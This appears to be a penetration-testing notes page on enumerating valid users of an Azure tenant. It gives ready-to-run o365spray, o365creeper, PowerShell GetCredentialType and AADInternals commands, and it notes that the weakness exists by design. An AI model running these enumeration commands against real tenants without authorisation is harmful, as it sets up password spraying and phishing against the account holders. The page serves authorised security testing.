User Spraying
Vulnerability
Knowing the domain name associated with an Azure tenant, you can perform a spraying attack to identify which users exist in it.
Prerequisites
- Internet connection.
Exploit
Use O365Spray.
# First, validate the domain exists.
o365spray --validate --domain $DomainName
# Then, perform user spraying.
o365spray --enum -U Usernames.txt --domain $DomainName
Using O365Creeper, you can spray email addresses without specifying a domain. It outputs the addresses that belong to an Azure tenant.
# Yeah, it only works with Python 2...
python2.7 o365creeper.py -f Emails.txt -o ValidEmails.txt
You can also check whether a single user exists like so.
# Returns 0 or 6 if the username exists.
Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/GetCredentialType" -ContentType "application/json" -Method POST -Body (@{"username"="$Email"; "isOtherIdpSupported" = $true}|ConvertTo-Json) | Select -ExpandProperty IfExistsResult
# With AADInternals.
Get-AADIntLoginInformation -UserName $Email
Recommendations
- Nothing to do here; this exploit is possible by design.